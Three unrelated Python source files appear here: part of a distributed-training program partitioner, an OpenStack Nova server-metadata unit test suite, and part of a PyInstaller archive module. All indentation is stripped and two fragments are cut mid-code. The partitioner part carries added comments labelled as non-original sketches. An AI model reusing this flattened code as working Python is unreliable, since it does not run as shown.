partitioned_params_and_grads.append((dist_p, dist_g))
return partitioned_main_prog, partitioned_params_and_grads
def partition_block(self, ref_block, target_block):
dist_op_context = self._dist_context.dist_op_context
serial_ops = ref_block.ops
# init mapping
forward_op_id2forward_op = {}
for idx in range(len(serial_ops)):
if is_forward_op(serial_ops[idx]):
forward_op_id2forward_op[serial_ops[idx].desc.id(
)] = serial_ops[idx]
# partition
for op in serial_ops:
# partition input variables
for serial_input_varname in op.desc.input_arg_names():
if serial_input_varname not in self._serial2dist_varname_mapping:
new_varname = serial_input_varname + self._dist_varname_suffix
if ref_block.has_var(serial_input_varname):
_partition_var(self._dist_context, ref_block,
target_block, serial_input_varname,
new_varname)
else:
assert serial_input_varname in __varname_not_in_block__
self._serial2dist_varname_mapping[
serial_input_varname] = new_varname
# partition output vars
for serial_output_varname in op.desc.output_arg_names():
if serial_output_varname not in self._serial2dist_varname_mapping:
new_varname = serial_output_varname + self._dist_varname_suffix
_partition_var(self._dist_context, ref_block, target_block,
serial_output_varname, new_varname)
self._serial2dist_varname_mapping[
serial_output_varname] = new_varname
# partition op
op_dist_attr = self._dist_context.get_op_dist_attr_for_program(op)
if is_forward_op(op) or op_dist_attr.is_recompute:
kinputs, koutputs = dist_op_context.prepare_context(op)
dist_op_forward_impl = _get_dist_op_forward_implement(
op, self._dist_context)
dist_op_forward_impl.forward(self._dist_context, **kinputs,
**koutputs)
elif is_backward_op(op):
kinputs, koutputs = dist_op_context.prepare_context(op)
dist_op_backward_impl = _get_dist_op_backward_implement(
op, self._dist_context, forward_op_id2forward_op)
dist_op_backward_impl.backward(self._dist_context, **kinputs,
**koutputs)
else:
raise NotImplementedError(
"partitioner only support forward op and backward op, but got {}".
format(str(op)))
def _is_valid_annotated_program(self, program):
# TODO (ZJ-LIANG) should check all block
ops = program.global_block().ops
vars_ = program.list_vars()
op_dist_attrs = [
self._dist_context.get_op_dist_attr_for_program(op) for op in ops
]
var_dist_attrs = [
self._dist_context.get_tensor_dist_attr_for_program(var)
for var in vars_ if (var.type not in __not_shape_var_type__)
]
all_ops_annotated = all(dist_attr is not None
for dist_attr in op_dist_attrs)
all_vars_annotated = all(dist_attr is not None
for dist_attr in var_dist_attrs)
return all_ops_annotated and all_vars_annotated
def _get_dist_var_by_serial_var(self, serial_var, partitioned_main_prog):
block_idx = serial_var.block.idx
target_block = partitioned_main_prog.blocks[block_idx]
dist_var_name = self._serial2dist_varname_mapping[serial_var.name]
assert target_block.has_var(dist_var_name)
return target_block.var(dist_var_name)
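# Illustrative sketch (assumption, not original code): how the auto parallel
# framework is expected to drive the Partitioner above. `dist_context`,
# `main_prog`, `startup_prog` and `params_grads` are hypothetical objects
# produced by the completion pass.
#
#   partitioner = Partitioner(dist_context, rank_id=rank)
#   dist_main, dist_startup, dist_params_grads = partitioner.partition(
#       main_prog, startup_prog, params_grads)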
def _get_dist_shape(var, dist_attr):
var_shape = var.shape
mapping = dist_attr.dims_mapping
mesh = dist_attr.process_mesh.topology
if mapping == []:
return var_shape
assert len(var_shape) == len(
mapping
), "variable shape [{}] and dim_mapping [{}] is NOT match !".format(
var_shape, mapping)
new_shape = []
for idx in range(len(var_shape)):
if var_shape[idx] == -1 or mapping[idx] == -1:
new_shape.append(var_shape[idx])
else:
assert var_shape[idx] % mesh[mapping[
idx]] == 0, "un-event partition: var_shape[idx]=[{}], mesh[{}]".format(
var_shape[idx], mesh[mapping[idx]])
new_shape.append(var_shape[idx] // mesh[mapping[idx]])
return new_shape
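# Illustrative worked example (assumption, not original code) for the shape
# math above: a [64, 32] variable with dims_mapping [-1, 0] on a process mesh
# of topology [4] keeps dim 0 and splits dim 1 across 4 ranks:
#
#   var_shape = (64, 32); mapping = [-1, 0]; mesh = [4]
#   new_shape == [64, 32 // 4] == [64, 8]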
def _partition_parameter(dist_context, src_var, dst_block, dst_varname,
dst_shape):
# NOTE: hack to copy a Parameter
# the copied parameter is not yet initialized; it needs to be initialized later
copied_kwargs = {}
copied_kwargs['trainable'] = src_var.trainable
copied_kwargs['optimize_attr'] = src_var.optimize_attr
copied_kwargs['regularizer'] = src_var.regularizer
copied_kwargs['do_model_average'] = src_var.do_model_average
copied_kwargs['need_clip'] = src_var.need_clip
param = Parameter(
block=dst_block,
type=src_var.type,
name=dst_varname,
shape=dst_shape,
dtype=src_var.dtype,
lod_level=src_var.lod_level,
error_clip=src_var.error_clip,
stop_gradient=src_var.stop_gradient,
is_data=src_var.is_data,
belong_to_optimizer=src_var.belong_to_optimizer,
**copied_kwargs)
# set dist attr uid
# distributed_attr_uid = src_var.desc.get_distributed_attr_uid()
# param.desc.set_distributed_attr_uid(distributed_attr_uid)
dist_attr = copy.deepcopy(
dist_context.get_tensor_dist_attr_for_program(src_var))
assert dist_attr is not None
dist_context.set_tensor_dist_attr_for_program(param, dist_attr)
def _partition_intermediate_var(dist_context, src_var, dst_block, dst_varname,
dst_shape):
var = dst_block.create_var(
type=src_var.type,
name=dst_varname,
shape=dst_shape,
dtype=src_var.dtype,
lod_level=src_var.lod_level,
persistable=src_var.persistable,
error_clip=src_var.error_clip,
stop_gradient=src_var.stop_gradient,
is_data=src_var.is_data,
belong_to_optimizer=src_var.belong_to_optimizer)
# set dist attr uid
# distributed_attr_uid = src_var.desc.get_distributed_attr_uid()
# var.desc.set_distributed_attr_uid(distributed_attr_uid)
dist_attr = copy.deepcopy(
dist_context.get_tensor_dist_attr_for_program(src_var))
assert dist_attr is not None
dist_context.set_tensor_dist_attr_for_program(var, dist_attr)
def _partition_var(dist_context, src_block, dst_block, src_varname,
dst_varname):
"""
partition include: split + replicate
"""
src_var = src_block.var(src_varname)
if src_var.type in __not_shape_var_type__:
dst_block.create_var(
type=src_var.type,
name=dst_varname,
persistable=True,
stop_gradient=True)
target_shape = None
else:
dist_attr = dist_context.get_tensor_dist_attr_for_program(src_var)
target_shape = _get_dist_shape(src_var, dist_attr)
if isinstance(src_var, Parameter):
_partition_parameter(dist_context, src_var, dst_block, dst_varname,
target_shape)
else:
_partition_intermediate_var(dist_context, src_var, dst_block,
dst_varname, target_shape)
return target_shape
def _get_dist_op_backward_implement(backward_op, dist_context,
forward_op_id2forward_op):
dist_op_context = dist_context.dist_op_context
if backward_op.desc.id() in dist_op_context.grad_op_id_to_op_id:
forward_op_id = dist_op_context.grad_op_id_to_op_id[backward_op.desc.id(
)]
forward_op = forward_op_id2forward_op[forward_op_id]
forward_op_dist_attr = dist_context.get_op_dist_attr_for_program(
forward_op)
dist_op_impl_container = get_distributed_operator_impl_container(
forward_op_dist_attr.impl_type)
dist_op_impl = dist_op_impl_container.get_impl(
forward_op_dist_attr.impl_idx)
return dist_op_impl
# NOTE: trick for dist ops that only have a backward implementation
if backward_op.type in BACKWARD_ONLY_DIST_OPS:
op_dist_attr = dist_context.get_op_dist_attr_for_program(backward_op)
assert op_dist_attr.impl_idx >= 0
dist_op_impl = get_distributed_operator_impl_container(
op_dist_attr.impl_type).get_impl(op_dist_attr.impl_idx)
return dist_op_impl
dist_op = get_distributed_operator_impl_container("default")
return dist_op.get_impl(0)
def _get_dist_op_forward_implement(forward_op, dist_context):
dist_attr = dist_context.get_op_dist_attr_for_program(forward_op)
dist_op_impl_container = get_distributed_operator_impl_container(
dist_attr.impl_type)
dist_op_impl = dist_op_impl_container.get_impl(dist_attr.impl_idx)
return dist_op_impl
|
|
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
import mock
from oslo.config import cfg
import six
import webob
from nova.api.openstack.compute import server_metadata
from nova.compute import rpcapi as compute_rpcapi
from nova.compute import vm_states
import nova.db
from nova import exception
from nova.objects import instance as instance_obj
from nova.openstack.common import jsonutils
from nova.openstack.common import timeutils
from nova import test
from nova.tests.api.openstack import fakes
from nova.tests import fake_instance
CONF = cfg.CONF
def return_create_instance_metadata_max(context, server_id, metadata, delete):
return stub_max_server_metadata()
def return_create_instance_metadata(context, server_id, metadata, delete):
return stub_server_metadata()
def fake_instance_save(inst, **kwargs):
inst.metadata = stub_server_metadata()
inst.obj_reset_changes()
def return_server_metadata(context, server_id):
if not isinstance(server_id, six.string_types) or not len(server_id) == 36:
msg = 'id %s must be a uuid in return server metadata' % server_id
raise Exception(msg)
return stub_server_metadata()
def return_empty_server_metadata(context, server_id):
return {}
def delete_server_metadata(context, server_id, key):
pass
def stub_server_metadata():
metadata = {
"key1": "value1",
"key2": "value2",
"key3": "value3",
}
return metadata
def stub_max_server_metadata():
metadata = {"metadata": {}}
for num in range(CONF.quota_metadata_items):
metadata['metadata']['key%i' % num] = "blah"
return metadata
def return_server(context, server_id, columns_to_join=None):
return fake_instance.fake_db_instance(
**{'id': server_id,
'uuid': '0cc3346e-9fef-4445-abe6-5d2b2690ec64',
'name': 'fake',
'locked': False,
'launched_at': timeutils.utcnow(),
'vm_state': vm_states.ACTIVE})
def return_server_by_uuid(context, server_uuid,
columns_to_join=None, use_slave=False):
return fake_instance.fake_db_instance(
**{'id': 1,
'uuid': '0cc3346e-9fef-4445-abe6-5d2b2690ec64',
'name': 'fake',
'locked': False,
'launched_at': timeutils.utcnow(),
'metadata': stub_server_metadata(),
'vm_state': vm_states.ACTIVE})
def return_server_nonexistent(context, server_id,
columns_to_join=None, use_slave=False):
raise exception.InstanceNotFound(instance_id=server_id)
def fake_change_instance_metadata(self, context, instance, diff):
pass
class BaseTest(test.TestCase):
def setUp(self):
super(BaseTest, self).setUp()
fakes.stub_out_key_pair_funcs(self.stubs)
self.stubs.Set(nova.db, 'instance_get', return_server)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_by_uuid)
self.stubs.Set(nova.db, 'instance_metadata_get',
return_server_metadata)
self.stubs.Set(compute_rpcapi.ComputeAPI, 'change_instance_metadata',
fake_change_instance_metadata)
self.controller = server_metadata.Controller()
self.uuid = str(uuid.uuid4())
self.url = '/v1.1/fake/servers/%s/metadata' % self.uuid
class ServerMetaDataTest(BaseTest):
def test_index(self):
req = fakes.HTTPRequest.blank(self.url)
res_dict = self.controller.index(req, self.uuid)
expected = {
'metadata': {
'key1': 'value1',
'key2': 'value2',
'key3': 'value3',
},
}
self.assertEqual(expected, res_dict)
def test_index_nonexistent_server(self):
self.stubs.Set(nova.db, 'instance_metadata_get',
return_server_nonexistent)
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.index, req, self.url)
def test_index_no_data(self):
self.stubs.Set(nova.db, 'instance_metadata_get',
return_empty_server_metadata)
req = fakes.HTTPRequest.blank(self.url)
res_dict = self.controller.index(req, self.uuid)
expected = {'metadata': {}}
self.assertEqual(expected, res_dict)
def test_show(self):
req = fakes.HTTPRequest.blank(self.url + '/key2')
res_dict = self.controller.show(req, self.uuid, 'key2')
expected = {'meta': {'key2': 'value2'}}
self.assertEqual(expected, res_dict)
def test_show_nonexistent_server(self):
self.stubs.Set(nova.db, 'instance_metadata_get',
return_server_nonexistent)
req = fakes.HTTPRequest.blank(self.url + '/key2')
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show, req, self.uuid, 'key2')
def test_show_meta_not_found(self):
self.stubs.Set(nova.db, 'instance_metadata_get',
return_empty_server_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key6')
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.show, req, self.uuid, 'key6')
def test_delete(self):
self.stubs.Set(nova.db, 'instance_metadata_get',
return_server_metadata)
self.stubs.Set(nova.db, 'instance_metadata_delete',
delete_server_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key2')
req.method = 'DELETE'
res = self.controller.delete(req, self.uuid, 'key2')
self.assertIsNone(res)
def test_delete_nonexistent_server(self):
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_nonexistent)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'DELETE'
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.delete, req, self.uuid, 'key1')
def test_delete_meta_not_found(self):
self.stubs.Set(nova.db, 'instance_metadata_get',
return_empty_server_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key6')
req.method = 'DELETE'
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.delete, req, self.uuid, 'key6')
def test_create(self):
self.stubs.Set(instance_obj.Instance, 'save', fake_instance_save)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'POST'
req.content_type = "application/json"
body = {"metadata": {"key9": "value9"}}
req.body = jsonutils.dumps(body)
res_dict = self.controller.create(req, self.uuid, body)
body['metadata'].update({
"key1": "value1",
"key2": "value2",
"key3": "value3",
})
self.assertEqual(body, res_dict)
def test_create_empty_body(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'POST'
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, req, self.uuid, None)
def test_create_item_empty_key(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {"": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, req, self.uuid, body)
def test_create_item_key_too_long(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {("a" * 260): "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create,
req, self.uuid, body)
def test_create_nonexistent_server(self):
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_nonexistent)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'POST'
body = {"metadata": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.create, req, self.uuid, body)
def test_update_metadata(self):
self.stubs.Set(instance_obj.Instance, 'save', fake_instance_save)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'POST'
req.content_type = 'application/json'
expected = {
'metadata': {
'key1': 'updatedvalue',
'key29': 'newkey',
}
}
req.body = jsonutils.dumps(expected)
response = self.controller.update_all(req, self.uuid, expected)
self.assertEqual(expected, response)
def test_update_all(self):
self.stubs.Set(instance_obj.Instance, 'save', fake_instance_save)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
expected = {
'metadata': {
'key10': 'value10',
'key99': 'value99',
},
}
req.body = jsonutils.dumps(expected)
res_dict = self.controller.update_all(req, self.uuid, expected)
self.assertEqual(expected, res_dict)
def test_update_all_empty_container(self):
self.stubs.Set(instance_obj.Instance, 'save', fake_instance_save)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
expected = {'metadata': {}}
req.body = jsonutils.dumps(expected)
res_dict = self.controller.update_all(req, self.uuid, expected)
self.assertEqual(expected, res_dict)
def test_update_all_malformed_container(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
expected = {'meta': {}}
req.body = jsonutils.dumps(expected)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update_all, req, self.uuid, expected)
def test_update_all_malformed_data(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
expected = {'metadata': ['asdf']}
req.body = jsonutils.dumps(expected)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update_all, req, self.uuid, expected)
def test_update_all_nonexistent_server(self):
self.stubs.Set(nova.db, 'instance_get', return_server_nonexistent)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.content_type = "application/json"
body = {'metadata': {'key10': 'value10'}}
req.body = jsonutils.dumps(body)
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.update_all, req, '100', body)
def test_update_item(self):
self.stubs.Set(instance_obj.Instance, 'save', fake_instance_save)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
res_dict = self.controller.update(req, self.uuid, 'key1', body)
expected = {'meta': {'key1': 'value1'}}
self.assertEqual(expected, res_dict)
def test_update_item_nonexistent_server(self):
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_nonexistent)
req = fakes.HTTPRequest.blank('/v1.1/fake/servers/asdf/metadata/key1')
req.method = 'PUT'
body = {"meta": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPNotFound,
self.controller.update, req, self.uuid, 'key1', body)
def test_update_item_empty_body(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, self.uuid, 'key1', None)
def test_update_item_empty_key(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {"": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, self.uuid, '', body)
def test_update_item_key_too_long(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {("a" * 260): "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.update,
req, self.uuid, ("a" * 260), body)
def test_update_item_value_too_long(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {"key1": ("a" * 260)}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.update,
req, self.uuid, "key1", body)
def test_update_item_too_many_keys(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url + '/key1')
req.method = 'PUT'
body = {"meta": {"key1": "value1", "key2": "value2"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, self.uuid, 'key1', body)
def test_update_item_body_uri_mismatch(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url + '/bad')
req.method = 'PUT'
body = {"meta": {"key1": "value1"}}
req.body = jsonutils.dumps(body)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update, req, self.uuid, 'bad', body)
def test_too_many_metadata_items_on_create(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
data = {"metadata": {}}
for num in range(CONF.quota_metadata_items + 1):
data['metadata']['key%i' % num] = "blah"
req = fakes.HTTPRequest.blank(self.url)
req.method = 'POST'
req.body = jsonutils.dumps(data)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.create, req, self.uuid, data)
def test_invalid_metadata_items_on_create(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'POST'
req.headers["content-type"] = "application/json"
#test for long key
data = {"metadata": {"a" * 260: "value1"}}
req.body = jsonutils.dumps(data)
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.create, req, self.uuid, data)
#test for long value
data = {"metadata": {"key": "v" * 260}}
req.body = jsonutils.dumps(data)
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.create, req, self.uuid, data)
#test for empty key.
data = {"metadata": {"": "value1"}}
req.body = jsonutils.dumps(data)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.create, req, self.uuid, data)
def test_too_many_metadata_items_on_update_item(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
data = {"metadata": {}}
for num in range(CONF.quota_metadata_items + 1):
data['metadata']['key%i' % num] = "blah"
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.body = jsonutils.dumps(data)
req.headers["content-type"] = "application/json"
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.update_all, req, self.uuid, data)
def test_invalid_metadata_items_on_update_item(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
data = {"metadata": {}}
for num in range(CONF.quota_metadata_items + 1):
data['metadata']['key%i' % num] = "blah"
req = fakes.HTTPRequest.blank(self.url)
req.method = 'PUT'
req.body = jsonutils.dumps(data)
req.headers["content-type"] = "application/json"
#test for long key
data = {"metadata": {"a" * 260: "value1"}}
req.body = jsonutils.dumps(data)
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.update_all, req, self.uuid, data)
#test for long value
data = {"metadata": {"key": "v" * 260}}
req.body = jsonutils.dumps(data)
self.assertRaises(webob.exc.HTTPRequestEntityTooLarge,
self.controller.update_all, req, self.uuid, data)
#test for empty key.
data = {"metadata": {"": "value1"}}
req.body = jsonutils.dumps(data)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.update_all, req, self.uuid, data)
class BadStateServerMetaDataTest(BaseTest):
def setUp(self):
super(BadStateServerMetaDataTest, self).setUp()
self.stubs.Set(nova.db, 'instance_get', self._return_server_in_build)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
self._return_server_in_build_by_uuid)
self.stubs.Set(nova.db, 'instance_metadata_delete',
delete_server_metadata)
def test_invalid_state_on_delete(self):
req = fakes.HTTPRequest.blank(self.url + '/key2')
req.method = 'DELETE'
self.assertRaises(webob.exc.HTTPConflict, self.controller.delete,
req, self.uuid, 'key2')
def test_invalid_state_on_update_metadata(self):
self.stubs.Set(nova.db, 'instance_metadata_update',
return_create_instance_metadata)
req = fakes.HTTPRequest.blank(self.url)
req.method = 'POST'
req.content_type = 'application/json'
expected = {
'metadata': {
'key1': 'updatedvalue',
'key29': 'newkey',
}
}
req.body = jsonutils.dumps(expected)
self.assertRaises(webob.exc.HTTPConflict, self.controller.update_all,
req, self.uuid, expected)
def _return_server_in_build(self, context, server_id,
columns_to_join=None):
return fake_instance.fake_db_instance(
**{'id': server_id,
'uuid': '0cc3346e-9fef-4445-abe6-5d2b2690ec64',
'name': 'fake',
'locked': False,
'vm_state': vm_states.BUILDING})
def _return_server_in_build_by_uuid(self, context, server_uuid,
columns_to_join=None, use_slave=False):
return fake_instance.fake_db_instance(
**{'id': 1,
'uuid': '0cc3346e-9fef-4445-abe6-5d2b2690ec64',
'name': 'fake',
'locked': False,
'vm_state': vm_states.BUILDING})
@mock.patch.object(nova.compute.api.API, 'update_instance_metadata',
side_effect=exception.InstanceIsLocked(instance_uuid=0))
def test_instance_lock_update_metadata(self, mock_update):
req = fakes.HTTPRequest.blank(self.url)
req.method = 'POST'
req.content_type = 'application/json'
expected = {
'metadata': {
'keydummy': 'newkey',
}
}
req.body = jsonutils.dumps(expected)
self.assertRaises(webob.exc.HTTPConflict, self.controller.update_all,
req, self.uuid, expected)
|
|
#
# Copyright (C) 2005, Giovanni Bajo
# Based on previous work under copyright (c) 2002 McMillan Enterprises, Inc.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# In addition to the permissions in the GNU General Public License, the
# authors give you unlimited permission to link or embed the compiled
# version of this file into combinations with other programs, and to
# distribute those combinations without any restriction coming from the
# use of this file. (The General Public License restrictions do apply in
# other respects; for example, they cover modification of the file, and
# distribution when not linked into a combine executable.)
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA
# Subclasses may not need marshal or struct, but since they're
# builtin, importing is safe.
#
# While an Archive is really an abstraction for any "filesystem
# within a file", it is tuned for use with imputil.FuncImporter.
# This assumes it contains python code objects, indexed by
# the internal name (i.e., no '.py').
#
# See pyi_carchive.py for a more general archive (contains anything)
# that can be understood by a C program.
_verbose = 0
_listdir = None
_environ = None
### **NOTE** This module is used during bootstrap.
### Import *ONLY* builtin modules.
import marshal
import struct
import imp
import sys
def debug(msg):
if 0:
sys.stderr.write(msg + "\n")
sys.stderr.flush()
_c_suffixes = filter(lambda x: x[2] == imp.C_EXTENSION, imp.get_suffixes())
for nm in ('nt', 'posix'):
if nm in sys.builtin_module_names:
mod = __import__(nm)
_listdir = mod.listdir
_environ = mod.environ
break
versuffix = '%d%d' % sys.version_info[:2] # :todo: is this still used?
if "-vi" in sys.argv[1:]:
_verbose = 1
class ArchiveReadError(RuntimeError):
pass
class Archive(object):
"""
A base class for a repository of python code objects.
The extract method is used by imputil.ArchiveImporter
to get code objects by name (fully qualified name), so
an enduser "import a.b" would become
extract('a.__init__')
extract('a.b')
"""
MAGIC = 'PYL\0'
HDRLEN = 12 # default is MAGIC followed by python's magic, int pos of toc
TOCPOS = 8
TOCTMPLT = {}
os = None
_bincache = None
def __init__(self, path=None, start=0):
"""
Initialize an Archive. If path is omitted, it will be an empty Archive.
"""
self.toc = None
self.path = path
self.start = start
import imp
self.pymagic = imp.get_magic()
if path is not None:
self.lib = open(self.path, 'rb')
self.checkmagic()
self.loadtoc()
####### Sub-methods of __init__ - override as needed #############
def checkmagic(self):
"""
Overridable.
Check to see if the file object self.lib actually has a file
we understand.
"""
self.lib.seek(self.start) # default - magic is at start of file
if self.lib.read(len(self.MAGIC)) != self.MAGIC:
raise ArchiveReadError("%s is not a valid %s archive file"
% (self.path, self.__class__.__name__))
if self.lib.read(len(self.pymagic)) != self.pymagic:
raise ArchiveReadError("%s has version mismatch to dll" %
(self.path))
self.lib.read(4)
def loadtoc(self):
"""
Overridable.
Default: After magic comes an int (4 bytes, big-endian '!i') giving the
position of the TOC within self.lib.
Default: The TOC is a marshal-able string.
"""
self.lib.seek(self.start + self.TOCPOS)
(offset,) = struct.unpack('!i', self.lib.read(4))
self.lib.seek(self.start + offset)
self.toc = marshal.load(self.lib)
######## This is what is called by FuncImporter #######
## Since an Archive is flat, we ignore parent and modname.
#XXX obsolete - imputil only code
## def get_code(self, parent, modname, fqname):
## pass
####### Core method - Override as needed #########
def extract(self, name):
"""
Get the object corresponding to name, or None.
For use with imputil ArchiveImporter, object is a python code object.
'name' is the name as specified in an 'import name'.
'import a.b' will become:
extract('a') (return None because 'a' is not a code object)
extract('a.__init__') (return a code object)
extract('a.b') (return a code object)
Default implementation:
self.toc is a dict
self.toc[name] is pos
self.lib has the code object marshal-ed at pos
"""
ispkg, pos = self.toc.get(name, (0, None))
if pos is None:
return None
self.lib.seek(self.start + pos)
return ispkg, marshal.load(self.lib)
########################################################################
# Informational methods
def contents(self):
"""
Return a list of the contents
Default implementation assumes self.toc is a dict like object.
Not required by ArchiveImporter.
"""
return self.toc.keys()
########################################################################
# Building
####### Top level method - shouldn't need overriding #######
def _start_add_entries(self, path):
"""
Open an empty archive for addition of entries.
"""
assert(self.path is None)
self.path = path
self.lib = open(path, 'wb')
# Reserve space for the header.
if self.HDRLEN:
self.lib.write('\0' * self.HDRLEN)
# Create an empty table of contents.
if type(self.TOCTMPLT) == type({}):
self.toc = {}
else:
# FIXME Why do we need to assume callables and
# why not use @property decorator.
self.toc = self.TOCTMPLT() # Assume callable.
def _add_from_table_of_contents(self, toc):
"""
Add entries from a logical TOC (without absolute positioning info).
An entry in a logical TOC is a tuple:
entry[0] is the name (under which it will be saved).
entry[1] is the full pathname of the file.
entry[2] is a flag for its storage format (True or 1 if compressed).
entry[3] is the entry's type code.
"""
for toc_entry in toc:
self.add(toc_entry) # The guts of the archive.
def _finalize(self):
"""
Finalize an archive which has been opened using _start_add_entries(),
writing any needed padding and the table of contents.
"""
toc_pos = self.lib.tell()
self.save_toc(toc_pos)
if self.HDRLEN:
self.update_headers(toc_pos)
self.lib.close()
def build(self, archive_path, logical_toc):
"""
Create an archive file of name 'archive_path'.
logical_toc is a 'logical TOC' - a list of (name, path, ...)
where name is the internal name, eg 'a'
and path is a file to get the object from, eg './a.pyc'.
"""
self._start_add_entries(archive_path)
self._add_from_table_of_contents(logical_toc)
self._finalize()
####### manages keeping the internal TOC and the guts in sync #######
def add(self, entry):
"""
Override this to influence the mechanics of the Archive.
Assumes entry is a seq beginning with (nm, pth, ...) where
nm is the key by which we'll be asked for the object.
pth is the name of where we find the object. Overrides of
get_obj_from can make use of further elements in entry.
"""
if self.os is None:
import os
self.os = os
nm = entry[0]
pth = entry[1]
pynm, ext = self.os.path.splitext(self.os.path.basename(pth))
